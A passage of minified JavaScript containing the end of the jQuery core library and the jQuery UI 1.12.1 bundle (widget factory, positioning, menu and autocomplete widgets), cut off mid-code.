n.apply(t||this,e.concat(d.call(arguments)))},r.guid=n.guid=n.guid||i.guid++,r},i.holdReady=function(n){n?i.readyWait++:i.ready(!0)},i.isArray=Array.isArray,i.parseJSON=JSON.parse,i.nodeName=v,i.isFunction=u,i.isWindow=tt,i.camelCase=y,i.type=it,i.now=Date.now,i.isNumeric=function(n){var t=i.type(n);return("number"===t||"string"===t)&&!isNaN(n-parseFloat(n))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return i}),pf=n.jQuery,wf=n.$,i.noConflict=function(t){return n.$===i&&(n.$=wf),t&&n.jQuery===i&&(n.jQuery=pf),i},t||(n.jQuery=n.$=i),i}); /*! jQuery UI - v1.12.1 - 2018-05-24 * http://jqueryui.com * Includes: widget.js, position.js, keycode.js, unique-id.js, widgets/autocomplete.js, widgets/menu.js * Copyright jQuery Foundation and other contributors; Licensed MIT */ (function(n){"function"==typeof define&&define.amd?define(["jquery"],n):n(jQuery)})(function(n){n.ui=n.ui||{};n.ui.version="1.12.1";var i=0,t=Array.prototype.slice;n.cleanData=function(t){return function(i){for(var r,u,f=0;null!=(u=i[f]);f++)try{r=n._data(u,"events");r&&r.remove&&n(u).triggerHandler("remove")}catch(e){}t(i)}}(n.cleanData);n.widget=function(t,i,r){var f,u,o,h={},e=t.split(".")[0],s;return t=t.split(".")[1],s=e+"-"+t,r||(r=i,i=n.Widget),n.isArray(r)&&(r=n.extend.apply(null,[{}].concat(r))),n.expr[":"][s.toLowerCase()]=function(t){return!!n.data(t,s)},n[e]=n[e]||{},f=n[e][t],u=n[e][t]=function(n,t){return this._createWidget?(arguments.length&&this._createWidget(n,t),void 0):new u(n,t)},n.extend(u,f,{version:r.version,_proto:n.extend({},r),_childConstructors:[]}),o=new i,o.options=n.widget.extend({},o.options),n.each(r,function(t,r){return n.isFunction(r)?(h[t]=function(){function n(){return i.prototype[t].apply(this,arguments)}function u(n){return i.prototype[t].apply(this,n)}return function(){var t,i=this._super,f=this._superApply;return this._super=n,this._superApply=u,t=r.apply(this,arguments),this._super=i,this._superApply=f,t}}(),void 0):(h[t]=r,void 0)}),u.prototype=n.widget.extend(o,{widgetEventPrefix:f?o.widgetEventPrefix||t:t},h,{constructor:u,namespace:e,widgetName:t,widgetFullName:s}),f?(n.each(f._childConstructors,function(t,i){var r=i.prototype;n.widget(r.namespace+"."+r.widgetName,u,i._proto)}),delete f._childConstructors):i._childConstructors.push(u),n.widget.bridge(t,u),u};n.widget.extend=function(i){for(var r,u,e=t.call(arguments,1),f=0,o=e.length;o>f;f++)for(r in e[f])u=e[f][r],e[f].hasOwnProperty(r)&&void 0!==u&&(i[r]=n.isPlainObject(u)?n.isPlainObject(i[r])?n.widget.extend({},i[r],u):n.widget.extend({},u):u);return i};n.widget.bridge=function(i,r){var u=r.prototype.widgetFullName||i;n.fn[i]=function(f){var s="string"==typeof f,o=t.call(arguments,1),e=this;return s?this.length||"instance"!==f?this.each(function(){var t,r=n.data(this,u);return"instance"===f?(e=r,!1):r?n.isFunction(r[f])&&"_"!==f.charAt(0)?(t=r[f].apply(r,o),t!==r&&void 0!==t?(e=t&&t.jquery?e.pushStack(t.get()):t,!1):void 0):n.error("no such method '"+f+"' for "+i+" widget instance"):n.error("cannot call methods on "+i+" prior to initialization; attempted to call method '"+f+"'")}):e=void 0:(o.length&&(f=n.widget.extend.apply(null,[f].concat(o))),this.each(function(){var t=n.data(this,u);t?(t.option(f||{}),t._init&&t._init()):n.data(this,u,new r(f,this))})),e}};n.Widget=function(){};n.Widget._childConstructors=[];n.Widget.prototype={widgetName:"widget",widgetEventPrefix:"",defaultElement:"<div>",options:{classes:{},disabled:!1,create:null},_createWidget:function(t,r){r=n(r||this.defaultElement||this)[0];this.element=n(r);this.uuid=i++;this.eventNamespace="."+this.widgetName+this.uuid;this.bindings=n();this.hoverable=n();this.focusable=n();this.classesElementLookup={};r!==this&&(n.data(r,this.widgetFullName,this),this._on(!0,this.element,{remove:function(n){n.target===r&&this.destroy()}}),this.document=n(r.style?r.ownerDocument:r.document||r),this.window=n(this.document[0].defaultView||this.document[0].parentWindow));this.options=n.widget.extend({},this.options,this._getCreateOptions(),t);this._create();this.options.disabled&&this._setOptionDisabled(this.options.disabled);this._trigger("create",null,this._getCreateEventData());this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:n.noop,_create:n.noop,_init:n.noop,destroy:function(){var t=this;this._destroy();n.each(this.classesElementLookup,function(n,i){t._removeClass(i,n)});this.element.off(this.eventNamespace).removeData(this.widgetFullName);this.widget().off(this.eventNamespace).removeAttr("aria-disabled");this.bindings.off(this.eventNamespace)},_destroy:n.noop,widget:function(){return this.element},option:function(t,i){var r,u,f,e=t;if(0===arguments.length)return n.widget.extend({},this.options);if("string"==typeof t)if(e={},r=t.split("."),t=r.shift(),r.length){for(u=e[t]=n.widget.extend({},this.options[t]),f=0;r.length-1>f;f++)u[r[f]]=u[r[f]]||{},u=u[r[f]];if(t=r.pop(),1===arguments.length)return void 0===u[t]?null:u[t];u[t]=i}else{if(1===arguments.length)return void 0===this.options[t]?null:this.options[t];e[t]=i}return this._setOptions(e),this},_setOptions:function(n){for(var t in n)this._setOption(t,n[t]);return this},_setOption:function(n,t){return"classes"===n&&this._setOptionClasses(t),this.options[n]=t,"disabled"===n&&this._setOptionDisabled(t),this},_setOptionClasses:function(t){var i,u,r;for(i in t)r=this.classesElementLookup[i],t[i]!==this.options.classes[i]&&r&&r.length&&(u=n(r.get()),this._removeClass(r,i),u.addClass(this._classes({element:u,keys:i,classes:t,add:!0})))},_setOptionDisabled:function(n){this._toggleClass(this.widget(),this.widgetFullName+"-disabled",null,!!n);n&&(this._removeClass(this.hoverable,null,"ui-state-hover"),this._removeClass(this.focusable,null,"ui-state-focus"))},enable:function(){return this._setOptions({disabled:!1})},disable:function(){return this._setOptions({disabled:!0})},_classes:function(t){function r(r,f){for(var o,e=0;r.length>e;e++)o=u.classesElementLookup[r[e]]||n(),o=t.add?n(n.unique(o.get().concat(t.element.get()))):n(o.not(t.element).get()),u.classesElementLookup[r[e]]=o,i.push(r[e]),f&&t.classes[r[e]]&&i.push(t.classes[r[e]])}var i=[],u=this;return t=n.extend({element:this.element,classes:this.options.classes||{}},t),this._on(t.element,{remove:"_untrackClassesElement"}),t.keys&&r(t.keys.match(/\S+/g)||[],!0),t.extra&&r(t.extra.match(/\S+/g)||[]),i.join(" ")},_untrackClassesElement:function(t){var i=this;n.each(i.classesElementLookup,function(r,u){-1!==n.inArray(t.target,u)&&(i.classesElementLookup[r]=n(u.not(t.target).get()))})},_removeClass:function(n,t,i){return this._toggleClass(n,t,i,!1)},_addClass:function(n,t,i){return this._toggleClass(n,t,i,!0)},_toggleClass:function(n,t,i,r){r="boolean"==typeof r?r:i;var u="string"==typeof n||null===n,f={extra:u?t:i,keys:u?n:t,element:u?this.element:n,add:r};return f.element.toggleClass(this._classes(f),r),this},_on:function(t,i,r){var f,u=this;"boolean"!=typeof t&&(r=i,i=t,t=!1);r?(i=f=n(i),this.bindings=this.bindings.add(i)):(r=i,i=this.element,f=this.widget());n.each(r,function(r,e){function o(){if(t||u.options.disabled!==!0&&!n(this).hasClass("ui-state-disabled"))return("string"==typeof e?u[e]:e).apply(u,arguments)}"string"!=typeof e&&(o.guid=e.guid=e.guid||o.guid||n.guid++);var s=r.match(/^([\w:-]*)\s*(.*)$/),h=s[1]+u.eventNamespace,c=s[2];c?f.on(h,c,o):i.on(h,o)})},_off:function(t,i){i=(i||"").split(" ").join(this.eventNamespace+" ")+this.eventNamespace;t.off(i).off(i);this.bindings=n(this.bindings.not(t).get());this.focusable=n(this.focusable.not(t).get());this.hoverable=n(this.hoverable.not(t).get())},_delay:function(n,t){function r(){return("string"==typeof n?i[n]:n).apply(i,arguments)}var i=this;return setTimeout(r,t||0)},_hoverable:function(t){this.hoverable=this.hoverable.add(t);this._on(t,{mouseenter:function(t){this._addClass(n(t.currentTarget),null,"ui-state-hover")},mouseleave:function(t){this._removeClass(n(t.currentTarget),null,"ui-state-hover")}})},_focusable:function(t){this.focusable=this.focusable.add(t);this._on(t,{focusin:function(t){this._addClass(n(t.currentTarget),null,"ui-state-focus")},focusout:function(t){this._removeClass(n(t.currentTarget),null,"ui-state-focus")}})},_trigger:function(t,i,r){var u,f,e=this.options[t];if(r=r||{},i=n.Event(i),i.type=(t===this.widgetEventPrefix?t:this.widgetEventPrefix+t).toLowerCase(),i.target=this.element[0],f=i.originalEvent)for(u in f)u in i||(i[u]=f[u]);return this.element.trigger(i,r),!(n.isFunction(e)&&e.apply(this.element[0],[i].concat(r))===!1||i.isDefaultPrevented())}};n.each({show:"fadeIn",hide:"fadeOut"},function(t,i){n.Widget.prototype["_"+t]=function(r,u,f){"string"==typeof u&&(u={effect:u});var o,e=u?u===!0||"number"==typeof u?i:u.effect||i:t;u=u||{};"number"==typeof u&&(u={duration:u});o=!n.isEmptyObject(u);u.complete=f;u.delay&&r.delay(u.delay);o&&n.effects&&n.effects.effect[e]?r[t](u):e!==t&&r[e]?r[e](u.duration,u.easing,f):r.queue(function(i){n(this)[t]();f&&f.call(r[0]);i()})}});n.widget,function(){function f(n,t,i){return[parseFloat(n[0])*(c.test(n[0])?t/100:1),parseFloat(n[1])*(c.test(n[1])?i/100:1)]}function i(t,i){return parseInt(n.css(t,i),10)||0}function l(t){var i=t[0];return 9===i.nodeType?{width:t.width(),height:t.height(),offset:{top:0,left:0}}:n.isWindow(i)?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:i.preventDefault?{width:0,height:0,offset:{top:i.pageY,left:i.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()}}var u,r=Math.max,t=Math.abs,e=/left|center|right/,o=/top|center|bottom/,s=/[\+\-]\d+(\.[\d]+)?%?/,h=/^\w+/,c=/%$/,a=n.fn.position;n.position={scrollbarWidth:function(){if(void 0!==u)return u;var r,i,t=n("<div style='display:block;position:absolute;width:50px;height:50px;overflow:hidden;'><div style='height:100px;width:auto;'><\/div><\/div>"),f=t.children()[0];return n("body").append(t),r=f.offsetWidth,t.css("overflow","scroll"),i=f.offsetWidth,r===i&&(i=t[0].clientWidth),t.remove(),u=r-i},getScrollInfo:function(t){var i=t.isWindow||t.isDocument?"":t.element.css("overflow-x"),r=t.isWindow||t.isDocument?"":t.element.css("overflow-y"),u="scroll"===i||"auto"===i&&t.width<t.element[0].scrollWidth,f="scroll"===r||"auto"===r&&t.height<t.element[0].scrollHeight;return{width:f?n.position.scrollbarWidth():0,height:u?n.position.scrollbarWidth():0}},getWithinInfo:function(t){var i=n(t||window),r=n.isWindow(i[0]),u=!!i[0]&&9===i[0].nodeType,f=!r&&!u;return{element:i,isWindow:r,isDocument:u,offset:f?n(t).offset():{left:0,top:0},scrollLeft:i.scrollLeft(),scrollTop:i.scrollTop(),width:i.outerWidth(),height:i.outerHeight()}}};n.fn.position=function(u){if(!u||!u.of)return a.apply(this,arguments);u=n.extend({},u);var w,c,v,p,y,k,d=n(u.of),nt=n.position.getWithinInfo(u.within),tt=n.position.getScrollInfo(nt),b=(u.collision||"flip").split(" "),g={};return k=l(d),d[0].preventDefault&&(u.at="left top"),c=k.width,v=k.height,p=k.offset,y=n.extend({},p),n.each(["my","at"],function(){var t,i,n=(u[this]||"").split(" ");1===n.length&&(n=e.test(n[0])?n.concat(["center"]):o.test(n[0])?["center"].concat(n):["center","center"]);n[0]=e.test(n[0])?n[0]:"center";n[1]=o.test(n[1])?n[1]:"center";t=s.exec(n[0]);i=s.exec(n[1]);g[this]=[t?t[0]:0,i?i[0]:0];u[this]=[h.exec(n[0])[0],h.exec(n[1])[0]]}),1===b.length&&(b[1]=b[0]),"right"===u.at[0]?y.left+=c:"center"===u.at[0]&&(y.left+=c/2),"bottom"===u.at[1]?y.top+=v:"center"===u.at[1]&&(y.top+=v/2),w=f(g.at,c,v),y.left+=w[0],y.top+=w[1],this.each(function(){var a,k,o=n(this),s=o.outerWidth(),h=o.outerHeight(),it=i(this,"marginLeft"),rt=i(this,"marginTop"),ut=s+it+i(this,"marginRight")+tt.width,ft=h+rt+i(this,"marginBottom")+tt.height,e=n.extend({},y),l=f(g.my,o.outerWidth(),o.outerHeight());"right"===u.my[0]?e.left-=s:"center"===u.my[0]&&(e.left-=s/2);"bottom"===u.my[1]?e.top-=h:"center"===u.my[1]&&(e.top-=h/2);e.left+=l[0];e.top+=l[1];a={marginLeft:it,marginTop:rt};n.each(["left","top"],function(t,i){n.ui.position[b[t]]&&n.ui.position[b[t]][i](e,{targetWidth:c,targetHeight:v,elemWidth:s,elemHeight:h,collisionPosition:a,collisionWidth:ut,collisionHeight:ft,offset:[w[0]+l[0],w[1]+l[1]],my:u.my,at:u.at,within:nt,elem:o})});u.using&&(k=function(n){var i=p.left-e.left,a=i+c-s,f=p.top-e.top,y=f+v-h,l={target:{element:d,left:p.left,top:p.top,width:c,height:v},element:{element:o,left:e.left,top:e.top,width:s,height:h},horizontal:0>a?"left":i>0?"right":"center",vertical:0>y?"top":f>0?"bottom":"middle"};s>c&&c>t(i+a)&&(l.horizontal="center");h>v&&v>t(f+y)&&(l.vertical="middle");l.important=r(t(i),t(a))>r(t(f),t(y))?"horizontal":"vertical";u.using.call(this,n,l)});o.offset(n.extend(e,{using:k}))})};n.ui.position={fit:{left:function(n,t){var h,e=t.within,u=e.isWindow?e.scrollLeft:e.offset.left,o=e.width,s=n.left-t.collisionPosition.marginLeft,i=u-s,f=s+t.collisionWidth-o-u;t.collisionWidth>o?i>0&&0>=f?(h=n.left+i+t.collisionWidth-o-u,n.left+=i-h):n.left=f>0&&0>=i?u:i>f?u+o-t.collisionWidth:u:i>0?n.left+=i:f>0?n.left-=f:n.left=r(n.left-s,n.left)},top:function(n,t){var h,o=t.within,u=o.isWindow?o.scrollTop:o.offset.top,e=t.within.height,s=n.top-t.collisionPosition.marginTop,i=u-s,f=s+t.collisionHeight-e-u;t.collisionHeight>e?i>0&&0>=f?(h=n.top+i+t.collisionHeight-e-u,n.top+=i-h):n.top=f>0&&0>=i?u:i>f?u+e-t.collisionHeight:u:i>0?n.top+=i:f>0?n.top-=f:n.top=r(n.top-s,n.top)}},flip:{left:function(n,i){var o,s,r=i.within,y=r.offset.left+r.scrollLeft,c=r.width,h=r.isWindow?r.scrollLeft:r.offset.left,l=n.left-i.collisionPosition.marginLeft,a=l-h,v=l+i.collisionWidth-c-h,u="left"===i.my[0]?-i.elemWidth:"right"===i.my[0]?i.elemWidth:0,f="left"===i.at[0]?i.targetWidth:"right"===i.at[0]?-i.targetWidth:0,e=-2*i.offset[0];0>a?(o=n.left+u+f+e+i.collisionWidth-c-y,(0>o||t(a)>o)&&(n.left+=u+f+e)):v>0&&(s=n.left-i.collisionPosition.marginLeft+u+f+e-h,(s>0||v>t(s))&&(n.left+=u+f+e))},top:function(n,i){var o,s,r=i.within,y=r.offset.top+r.scrollTop,c=r.height,h=r.isWindow?r.scrollTop:r.offset.top,l=n.top-i.collisionPosition.marginTop,a=l-h,v=l+i.collisionHeight-c-h,p="top"===i.my[1],u=p?-i.elemHeight:"bottom"===i.my[1]?i.elemHeight:0,f="top"===i.at[1]?i.targetHeight:"bottom"===i.at[1]?-i.targetHeight:0,e=-2*i.offset[1];0>a?(s=n.top+u+f+e+i.collisionHeight-c-y,(0>s||t(a)>s)&&(n.top+=u+f+e)):v>0&&(o=n.top-i.collisionPosition.marginTop+u+f+e-h,(o>0||v>t(o))&&(n.top+=u+f+e))}},flipfit:{left:function(){n.ui.position.flip.left.apply(this,arguments);n.ui.position.fit.left.apply(this,arguments)},top:function(){n.ui.position.flip.top.apply(this,arguments);n.ui.position.fit.top.apply(this,arguments)}}}}();n.ui.position;n.ui.keyCode={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38};n.fn.extend({uniqueId:function(){var n=0;return function(){return this.each(function(){this.id||(this.id="ui-id-"+ ++n)})}}(),removeUniqueId:function(){return this.each(function(){/^ui-id-\d+$/.test(this.id)&&n(this).removeAttr("id")})}});n.ui.safeActiveElement=function(n){var t;try{t=n.activeElement}catch(i){t=n.body}return t||(t=n.body),t.nodeName||(t=n.body),t};n.widget("ui.menu",{version:"1.12.1",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-caret-1-e"},items:"> *",menus:"ul",position:{my:"left top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element;this.mouseHandled=!1;this.element.uniqueId().attr({role:this.options.role,tabIndex:0});this._addClass("ui-menu","ui-widget ui-widget-content");this._on({"mousedown .ui-menu-item":function(n){n.preventDefault()},"click .ui-menu-item":function(t){var i=n(t.target),r=n(n.ui.safeActiveElement(this.document[0]));!this.mouseHandled&&i.not(".ui-state-disabled").length&&(this.select(t),t.isPropagationStopped()||(this.mouseHandled=!0),i.has(".ui-menu").length?this.expand(t):!this.element.is(":focus")&&r.closest(".ui-menu").length&&(this.element.trigger("focus",[!0]),this.active&&1===this.active.parents(".ui-menu").length&&clearTimeout(this.timer)))},"mouseenter .ui-menu-item":function(t){if(!this.previousFilter){var r=n(t.target).closest(".ui-menu-item"),i=n(t.currentTarget);r[0]===i[0]&&(this._removeClass(i.siblings().children(".ui-state-active"),null,"ui-state-active"),this.focus(t,i))}},mouseleave:"collapseAll","mouseleave .ui-menu":"collapseAll",focus:function(n,t){var i=this.active||this.element.find(this.options.items).eq(0);t||this.focus(n,i)},blur:function(t){this._delay(function(){var i=!n.contains(this.element[0],n.ui.safeActiveElement(this.document[0]));i&&this.collapseAll(t)})},keydown:"_keydown"});this.refresh();this._on(this.document,{click:function(n){this._closeOnDocumentClick(n)&&this.collapseAll(n);this.mouseHandled=!1}})},_destroy:function(){var t=this.element.find(".ui-menu-item").removeAttr("role aria-disabled"),i=t.children(".ui-menu-item-wrapper").removeUniqueId().removeAttr("tabIndex role aria-haspopup");this.element.removeAttr("aria-activedescendant").find(".ui-menu").addBack().removeAttr("role aria-labelledby aria-expanded aria-hidden aria-disabled tabIndex").removeUniqueId().show();i.children().each(function(){var t=n(this);t.data("ui-menu-submenu-caret")&&t.remove()})},_keydown:function(t){var i,u,r,f,e=!0;switch(t.keyCode){case n.ui.keyCode.PAGE_UP:this.previousPage(t);break;case n.ui.keyCode.PAGE_DOWN:this.nextPage(t);break;case n.ui.keyCode.HOME:this._move("first","first",t);break;case n.ui.keyCode.END:this._move("last","last",t);break;case n.ui.keyCode.UP:this.previous(t);break;case n.ui.keyCode.DOWN:this.next(t);break;case n.ui.keyCode.LEFT:this.collapse(t);break;case n.ui.keyCode.RIGHT:this.active&&!this.active.is(".ui-state-disabled")&&this.expand(t);break;case n.ui.keyCode.ENTER:case n.ui.keyCode.SPACE:this._activate(t);break;case n.ui.keyCode.ESCAPE:this.collapse(t);break;default:e=!1;u=this.previousFilter||"";f=!1;r=t.keyCode>=96&&105>=t.keyCode?""+(t.keyCode-96):String.fromCharCode(t.keyCode);clearTimeout(this.filterTimer);r===u?f=!0:r=u+r;i=this._filterMenuItems(r);i=f&&-1!==i.index(this.active.next())?this.active.nextAll(".ui-menu-item"):i;i.length||(r=String.fromCharCode(t.keyCode),i=this._filterMenuItems(r));i.length?(this.focus(t,i),this.previousFilter=r,this.filterTimer=this._delay(function(){delete this.previousFilter},1e3)):delete this.previousFilter}e&&t.preventDefault()},_activate:function(n){this.active&&!this.active.is(".ui-state-disabled")&&(this.active.children("[aria-haspopup='true']").length?this.expand(n):this.select(n))},refresh:function(){var u,t,f,i,e,r=this,s=this.options.icons.submenu,o=this.element.find(this.options.menus);this._toggleClass("ui-menu-icons",null,!!this.element.find(".ui-icon").length);f=o.filter(":not(.ui-menu)").hide().attr({role:this.options.role,"aria-hidden":"true","aria-expanded":"false"}).each(function(){var t=n(this),i=t.prev(),u=n("<span>").data("ui-menu-submenu-caret",!0);r._addClass(u,"ui-menu-icon","ui-icon "+s);i.attr("aria-haspopup","true").prepend(u);t.attr("aria-labelledby",i.attr("id"))});this._addClass(f,"ui-menu","ui-widget ui-widget-content ui-front");u=o.add(this.element);t=u.find(this.options.items);t.not(".ui-menu-item").each(function(){var t=n(this);r._isDivider(t)&&r._addClass(t,"ui-menu-divider","ui-widget-content")});i=t.not(".ui-menu-item, .ui-menu-divider");e=i.children().not(".ui-menu").uniqueId().attr({tabIndex:-1,role:this._itemRole()});this._addClass(i,"ui-menu-item")._addClass(e,"ui-menu-item-wrapper");t.filter(".ui-state-disabled").attr("aria-disabled","true");this.active&&!n.contains(this.element[0],this.active[0])&&this.blur()},_itemRole:function(){return{menu:"menuitem",listbox:"option"}[this.options.role]},_setOption:function(n,t){if("icons"===n){var i=this.element.find(".ui-menu-icon");this._removeClass(i,null,this.options.icons.submenu)._addClass(i,null,t.submenu)}this._super(n,t)},_setOptionDisabled:function(n){this._super(n);this.element.attr("aria-disabled",n+"");this._toggleClass(null,"ui-state-disabled",!!n)},focus:function(n,t){var i,r,u;this.blur(n,n&&"focus"===n.type);this._scrollIntoView(t);this.active=t.first();r=this.active.children(".ui-menu-item-wrapper");this._addClass(r,null,"ui-state-active");this.options.role&&this.element.attr("aria-activedescendant",r.attr("id"));u=this.active.parent().closest(".ui-menu-item").children(".ui-menu-item-wrapper");this._addClass(u,null,"ui-state-active");n&&"keydown"===n.type?this._close():this.timer=this._delay(function(){this._close()},this.delay);i=t.children(".ui-menu");i.length&&n&&/^mouse/.test(n.type)&&this._startOpening(i);this.activeMenu=t.parent();this._trigger("focus",n,{item:t})},_scrollIntoView:function(t){var e,o,i,r,u,f;this._hasScroll()&&(e=parseFloat(n.css(this.activeMenu[0],"borderTopWidth"))||0,o=parseFloat(n.css(this.activeMenu[0],"paddingTop"))||0,i=t.offset().top-this.activeMenu.offset().top-e-o,r=this.activeMenu.scrollTop(),u=this.activeMenu.height(),f=t.outerHeight(),0>i?this.activeMenu.scrollTop(r+i):i+f>u&&this.activeMenu.scrollTop(r+i-u+f))},blur:function(n,t){t||clearTimeout(this.timer);this.active&&(this._removeClass(this.active.children(".ui-menu-item-wrapper"),null,"ui-state-active"),this._trigger("blur",n,{item:this.active}),this.active=null)},_startOpening:function(n){clearTimeout(this.timer);"true"===n.attr("aria-hidden")&&(this.timer=this._delay(function(){this._close();this._open(n)},this.delay))},_open:function(t){var i=n.extend({of:this.active},this.options.position);clearTimeout(this.timer);this.element.find(".ui-menu").not(t.parents(".ui-menu")).hide().attr("aria-hidden","true");t.show().removeAttr("aria-hidden").attr("aria-expanded","true").position(i)},collapseAll:function(t,i){clearTimeout(this.timer);this.timer=this._delay(function(){var r=i?this.element:n(t&&t.target).closest(this.element.find(".ui-menu"));r.length||(r=this.element);this._close(r);this.blur(t);this._removeClass(r.find(".ui-state-active"),null,"ui-state-active");this.activeMenu=r},this.delay)},_close:function(n){n||(n=this.active?this.active.parent():this.element);n.find(".ui-menu").hide().attr("aria-hidden","true").attr("aria-expanded","false")},_closeOnDocumentClick:function(t){return!n(t.target).closest(".ui-menu").length},_isDivider:function(n){return!/[^\-\u2014\u2013\s]/.test(n.text())},collapse:function(n){var t=this.active&&this.active.parent().closest(".ui-menu-item",this.element);t&&t.length&&(this._close(),this.focus(n,t))},expand:function(n){var t=this.active&&this.active.children(".ui-menu ").find(this.options.items).first();t&&t.length&&(this._open(t.parent()),this._delay(function(){this.focus(n,t)}))},next:function(n){this._move("next","first",n)},previous:function(n){this._move("prev","last",n)},isFirstItem:function(){return this.active&&!this.active.prevAll(".ui-menu-item").length},isLastItem:function(){return this.active&&!this.active.nextAll(".ui-menu-item").length},_move:function(n,t,i){var r;this.active&&(r="first"===n||"last"===n?this.active["first"===n?"prevAll":"nextAll"](".ui-menu-item").eq(-1):this.active[n+"All"](".ui-menu-item").eq(0));r&&r.length&&this.active||(r=this.activeMenu.find(this.options.items)[t]());this.focus(i,r)},nextPage:function(t){var i,r,u;return this.active?(this.isLastItem()||(this._hasScroll()?(r=this.active.offset().top,u=this.element.height(),this.active.nextAll(".ui-menu-item").each(function(){return i=n(this),0>i.offset().top-r-u}),this.focus(t,i)):this.focus(t,this.activeMenu.find(this.options.items)[this.active?"last":"first"]())),void 0):(this.next(t),void 0)},previousPage:function(t){var i,r,u;return this.active?(this.isFirstItem()||(this._hasScroll()?(r=this.active.offset().top,u=this.element.height(),this.active.prevAll(".ui-menu-item").each(function(){return i=n(this),i.offset().top-r+u>0}),this.focus(t,i)):this.focus(t,this.activeMenu.find(this.options.items).first())),void 0):(this.next(t),void 0)},_hasScroll:function(){return this.element.outerHeight()<this.element.prop("scrollHeight")},select:function(t){this.active=this.active||n(t.target).closest(".ui-menu-item");var i={item:this.active};this.active.has(".ui-menu").length||this.collapseAll(t,!0);this._trigger("select",t,i)},_filterMenuItems:function(t){var i=t.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$&"),r=RegExp("^"+i,"i");return this.activeMenu.find(this.options.items).filter(".ui-menu-item").filter(function(){return r.test(n.trim(n(this).children(".ui-menu-item-wrapper").text()))})}});n.widget("ui.autocomplete",{version:"1.12.1",defaultElement:"<input>",options:{appendTo:null,autoFocus:!1,delay:300,minLength:1,position:{my:"left top",at:"left bottom",collision:"none"},source:null,change:null,close:null,focus:null,open:null,response:null,search:null,select:null},requestIndex:0,pending:0,_create:function(){var t,i,r,u=this.element[0].nodeName.toLowerCase(),f="textarea"===u,e="input"===u;this.isMultiLine=f||!e&&this._isContentEditable(this.element);this.valueMethod=this.element[f||e?"val":"text"];this.isNewMenu=!0;this._addClass("ui-autocomplete-input");this.element.attr("autocomplete","off");this._on(this.element,{keydown:function(u){if(this.element.prop("readOnly"))return t=!0,r=!0,i=!0,void 0;t=!1;r=!1;i=!1;var f=n.ui.keyCode;switch(u.keyCode){case f.PAGE_UP:t=!0;this._move("previousPage",u);break;case f.PAGE_DOWN:t=!0;this._move("nextPage",u);break;case f.UP:t=!0;this._keyEvent("previous",u);break;case f.DOWN:t=!0;this._keyEvent("next",u);break;case f.ENTER:this.menu.active&&(t=!0,u.preventDefault(),this.menu.select(u));break;case f.TAB:this.menu.active&&this.menu.select(u);break;case f.ESCAPE:this.menu.element.is(":visible")&&(this.isMultiLine||this._value(this.term),this.close(u),u.preventDefault());break;default:i=!0;this._searchTimeout(u)}},keypress:function(r){if(t)return t=!1,(!this.isMultiLine||this.menu.element.is(":visible"))&&r.preventDefault(),void 0;if(!i){var u=n.ui.keyCode;switch(r.keyCode){case u.PAGE_UP:this._move("previousPage",r);break;case u.PAGE_DOWN:this._move("nextPage",r);break;case u.UP:this._keyEvent("previous",r);break;case u.DOWN:this._keyEvent("next",r)}}},input:function(n){return r?(r=!1,n.preventDefault(),void 0):(this._searchTimeout(n),void 0)},focus:function(){this.selectedItem=null;this.previous=this._value()},blur:function(n){return this.cancelBlur?(delete this.cancelBlur,void 0):(clearTimeout(this.searching),this.close(n),this._change(n),void 0)}});this._initSource();this.menu=n("<ul>").appendTo(this._appendTo()).menu({role:null}).hide().menu("instance");this._addClass(this.menu.element,"ui-autocomplete","ui-front");this._on(this.menu.element,{mousedown:function(t){t.preventDefault();this.cancelBlur=!0;this._delay(function(){delete this.cancelBlur;this.element[0]!==n.ui.safeActiveElement(this.document[0])&&this.element.trigger("focus")})},menufocus:function(t,i){var r,u;return this.isNewMenu&&(this.isNewMenu=!1,t.originalEvent&&/^mouse/.test(t.originalEvent.type))?(this.menu.blur(),this.document.one("mousemove",function(){n(t.target).trigger(t.originalEvent)}),void 0):(u=i.item.data("ui-autocomplete-item"),!1!==this._trigger("focus",t,{item:u})&&t.originalEvent&&/^key/.test(t.originalEvent.type)&&this._value(u.value),r=i.item.attr("aria-label")||u.value,r&&n.trim(r).length&&(this.liveRegion.children().hide(),n("<div>").text(r).appendTo(this.liveRegion)),void 0)},menuselect:function(t,i){var r=i.item.data("ui-autocomplete-item"),u=this.previous;this.element[0]!==n.ui.safeActiveElement(this.document[0])&&(this.element.trigger("focus"),this.previous=u,this._delay(function(){this.previous=u;this.selectedItem=r}));!1!==this._trigger("select",t,{item:r})&&this._value(r.value);this.term=this._value();this.close(t);this.selectedItem=r}});this.liveRegion=n("<div>",{role:"status","aria-live":"assertive","aria-relevant":"additions"}).appendTo(this.document[0].body);this._addClass(this.liveRegion,null,"ui-helper-hidden-accessible");this._on(this.window,{beforeunload:function(){this.element.removeAttr("autocomplete")}})},_destroy:function(){clearTimeout(this.searching);this.element.removeAttr("autocomplete");this.menu.element.remove();this.liveRegion.remove()},_setOption:function(n,t){this._super(n,t);"source"===n&&this._initSource();"appendTo"===n&&this.menu.element.appendTo(this._appendTo());"disabled"===n&&t&&this.xhr&&this.xhr.abort()},_isEventTargetInWidget:function(t){var i=this.menu.element[0];return t.target===this.element[0]||t.target===i||n.contains(i,t.target)},_closeOnClickOutside:function(n){this._isEventTargetInWidget(n)||this.close()},_appendTo:function(){var t=this.options.appendTo;return t&&(t=t.jquery||t.nodeType?n(t):this.document.find(t).eq(0)),t&&t[0]||(t=this.element.closest(".ui-front, dialog")),t.length||(t=this.document[0].body),t},_initSource:function(){var i,r,t=this;n.isArray(this.options.source)?(i=this.options.source,this.source=function(t,r){r(n.ui.autocomplete.filter(i,t.term))}):"string"==typeof this.options.source?(r=this.options.source,this.source=function(i,u){t.xhr&&t.xhr.abort();t.xhr=n.ajax({url:r,data:i,dataType:"json",success:function(n){u(n)},error:function(){u([])}})}):this.source=this.options.source},_searchTimeout:function(n){clearTimeout(this.searching);this.searching=this._delay(function(){var 